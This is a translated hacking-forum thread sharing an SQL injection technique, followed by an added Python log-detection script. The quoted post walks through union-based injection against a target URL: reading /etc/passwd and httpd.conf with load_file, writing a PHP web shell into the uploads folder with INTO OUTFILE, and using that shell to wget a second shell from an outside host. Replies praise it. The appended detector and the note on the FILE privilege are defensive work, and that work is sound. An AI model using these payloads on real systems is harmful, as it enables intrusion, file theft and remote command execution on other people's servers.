[Share] SQL Injection Load File
#11
Let me try this out first; hopefully there are still plenty of targets.

#12
Nice share, bro,
but I'm confused about how to find the path, bro? :3
Because when I use /etc/passwd it just comes up blank, there's nothing there.
Maybe the /etc/passwd path is protected, or it just isn't stored there :3
Please help, wine :3

#13
(01-30-2015, 09:06 PM)Hankz Wrote: I can't find the path, bro; how else should I look for the path, bro?
If you can't find it, that means it's not vulnerable, bro; try a different target.

(06-01-2014, 11:38 PM)wine trochanter Wrote: Assalamualaikum
just dropping in to spam, hehe
straight to it:
the advantage here is that you don't need an admin page to upload the backdoor

target
https://www.target.com/ajax_city_all_bra...ate=PANAJI

add a single quote
https://www.target.com/ajax_city_all_bra...ate=PANAJI'

SQLi error; use the order by 2-- command

now change it to this
https://www.target.com/ajax_city_all_bra...ate=PANAJI' order by 1--+
no more error

now use https://www.target.com/ajax_city_all_bra...ate=PANAJI' union select 1--+

check the user
https://www.target.com/ajax_city_all_bra...ate=PANAJI' union select user()--+

there, root
there are 2 requirements for doing this

For creating any file on the website with SQL queries, two things are most important:

1) Root path (we have it from the error)
2) File privileges for the current MySQL user; we have file privileges as well

translate it yourself, okay :)

next
https://www.target.com/ajax_city_all_bra...ate=PANAJI' union select load_file(0x2f6574632f706173737764)--+
then Ctrl+U

Next we look at the path so we know where the upload goes; that's probably the layman's way for me to put it.

https://www.target.com/ajax_city_all_bra...ate=PANAJI' UniOn SeleCt load_file(0x2f6574632f68747470642f636f6e662f68747470642e636f6e66)--+

Before that, I first tested opening the path, for example
https://www.target.com/uploads/ << it turns out it exists; let's try whether we can write a file there or not

https://www.target.com/ajax_city_all_bra...ate=PANAJI' UniOn SeleCt wine ganteng into outfile '/var/www/html/upload/hai.txt

convert the "wine ganteng" part to hex

Now let's try inserting this to download the backdoor
"<? system($_REQUEST['cmd']); ?>"
https://www.target.com/ajax_city_all_bra...ate=PANAJI' UniOn SeleCt 0x223c3f2073797374656d28245f524551554553545b27636d64275d293b203f3e22 into outfile '/var/www/html/uploads/lol.php'-- -

Then we use wget to download the shell that has a .txt extension
https://www.target.com/uploads/lol.php?cmd= wget http://pinjam.ac.id/a.txt
then we change the extension from txt to php
mv a.txt index(3)php

then just open it

That's all, and thank you
gretz to ch3rn0by1 | tr0jan | G_26 | IBT SEMARANG and you :*
There's an even simpler way, bro: use sqlmap
nice share, bro
Djoe | Psycho Security
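
Added example, not part of the thread: a log check a defender could run for the requests quoted above. It URL-decodes each request, matches `load_file(` and `into outfile` regardless of letter case, and decodes `0x...` literals so the hidden path or script is readable. The log lines, the `/branches.php` path, the rule names and the second hex literal are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (documentation IP, hypothetical /branches.php).
# The first hex literal is the one quoted in the thread; MARKER is built here.
MARKER = "0x" + b"<?php echo 'constructed'; ?>".hex()
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jun/2014:23:38:00 +0700] "GET /branches.php?state=PANAJI HTTP/1.1" 200 812',
    '203.0.113.7 - - [01/Jun/2014:23:41:12 +0700] "GET /branches.php?state=PANAJI%27+UniOn+SeleCt+'
    'load_file(0x2f6574632f706173737764)--+ HTTP/1.1" 200 1930',
    '203.0.113.7 - - [01/Jun/2014:23:47:55 +0700] "GET /branches.php?state=PANAJI%27+UniOn+SeleCt+'
    + MARKER + '+into+outfile+%27/var/www/html/uploads/x.php%27--+- HTTP/1.1" 200 0',
]

RULES = {  # case-insensitive, so "UniOn SeleCt" does not slip past
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "file_read": re.compile(r"\bload_file\s*\(", re.I),
    "file_write": re.compile(r"\binto\s+(?:out|dump)file\b", re.I),
}
HEX_LITERAL = re.compile(r"\b0x((?:[0-9a-f]{2})+)\b", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')

def decode_hex_literals(text):
    """Decode MySQL 0x... string literals that hold printable ASCII."""
    decoded = []
    for m in HEX_LITERAL.finditer(text):
        raw = bytes.fromhex(m.group(1))
        if len(raw) >= 4 and all(32 <= b < 127 for b in raw):
            decoded.append(raw.decode("ascii"))
    return decoded

def inspect(line):
    """Return the matched rule names and decoded literals for one log line."""
    m = REQUEST.search(line)
    if not m:
        return {"rules": [], "literals": []}
    target = unquote_plus(m.group(1))  # %27 -> ', + -> space
    hits = [name for name, rx in RULES.items() if rx.search(target)]
    literals = decode_hex_literals(target)
    if any("<?" in s for s in literals):
        hits.append("script_in_literal")
    return {"rules": hits, "literals": literals}

def alerts(lines):
    """Keep only requests that try to read or write files through the database."""
    return [r for r in map(inspect, lines) if {"file_read", "file_write"} & set(r["rules"])]

if __name__ == "__main__":
    print(alerts(SAMPLE_LOG))
```

On the database side, both prerequisites named in the quoted post disappear when the application connects as a MySQL account without the FILE privilege and `secure_file_priv` restricts where the server may read and write files.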

#14
wine is awesome
Quote:~ Tan Hana Wighna Tan Sirna ~

#15
(06-01-2014, 11:38 PM)wine trochanter Wrote: Assalamualaikum
Still GOLD om =))


Smile and Agree, Then Do Whatever The Fvck You Were Gonna Do



#16
Still cool, this one. Old-school bug but never dies ..
Don't Stab a Friend in the Back | Kurawa |